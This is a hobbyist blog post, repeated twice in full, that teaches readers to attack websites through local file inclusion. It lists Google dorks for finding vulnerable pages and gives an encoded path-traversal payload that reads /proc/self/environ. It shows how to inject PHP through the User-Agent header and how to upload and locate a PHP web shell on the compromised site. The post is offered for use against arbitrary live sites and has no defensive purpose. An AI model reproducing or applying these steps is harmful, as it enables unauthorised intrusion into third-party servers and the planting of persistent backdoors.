Hello , fuuhhh~ How a long time I not Updating my Blogspot xD
Hahaha ...
Ok, today im going to teach you about LFI ( Local File Inclusion ) with User Agent In
GOOGLE CHROME
.::Here is the step::.
1.Download user agent for chrome
2.Copy the code from URL :
http://pastebin.com/DbubYs04
3.After copy click to the user agent switcher then will out many of things such as
-Chrome
-Firefox
-Opera
and so on
4.Click Settings
5. -New User Agent Name : LFI
-New User Agent String : Paste the LFI Php Code here
-Group : LFI
-Indicator Flag : LFI
6.Enter the dork
allinurl:?page=contact.php
allinurl:?pg=contato.php
allinurl?p=contactform.php
allinurl:?file=gallery.php
allinurl:?id=contact.php
allinurl:?page=gallery.html
that is a few of dorks , there are many of dork for LFI
7.For example you has get the site
www.localhost.com/index.php?p=contactform.php
put the this string and replace the thing after ' = ' :
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
the site will be like this
www.localhost.com/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
8.And how to determine the vulnerablities?
--> after put the string the site will show like
DOCUMENT_ROOT=/bin/root/file/etc_ and so on
but the most important is the page show
HTTP_USER_AGENT:
This situation will let your user agent replace the Php code
9.Open your User Agent Switcher and click LFI
10.The upload file will shown and you may choose php shell to upload
11.To find the shell is easy
www.site.com/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
will be www.site.com/your_shell.php
if its in another directory
www.site.com/lol/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
will be www.site.com/lol/your_shell.php
THE END from me
EAGLE EYE
Hahaha ...
Ok, today im going to teach you about LFI ( Local File Inclusion ) with User Agent In
GOOGLE CHROME
.::Here is the step::.
1.Download user agent for chrome
2.Copy the code from URL :
http://pastebin.com/DbubYs04
3.After copy click to the user agent switcher then will out many of things such as
-Chrome
-Firefox
-Opera
and so on
4.Click Settings
5. -New User Agent Name : LFI
-New User Agent String : Paste the LFI Php Code here
-Group : LFI
-Indicator Flag : LFI
6.Enter the dork
allinurl:?page=contact.php
allinurl:?pg=contato.php
allinurl?p=contactform.php
allinurl:?file=gallery.php
allinurl:?id=contact.php
allinurl:?page=gallery.html
that is a few of dorks , there are many of dork for LFI
7.For example you has get the site
www.localhost.com/index.php?p=contactform.php
put the this string and replace the thing after ' = ' :
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
the site will be like this
www.localhost.com/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
8.And how to determine the vulnerablities?
--> after put the string the site will show like
DOCUMENT_ROOT=/bin/root/file/etc_ and so on
but the most important is the page show
HTTP_USER_AGENT:
This situation will let your user agent replace the Php code
9.Open your User Agent Switcher and click LFI
10.The upload file will shown and you may choose php shell to upload
11.To find the shell is easy
www.site.com/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
will be www.site.com/your_shell.php
if its in another directory
www.site.com/lol/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
will be www.site.com/lol/your_shell.php
THE END from me
EAGLE EYE
0 comments:
Post a Comment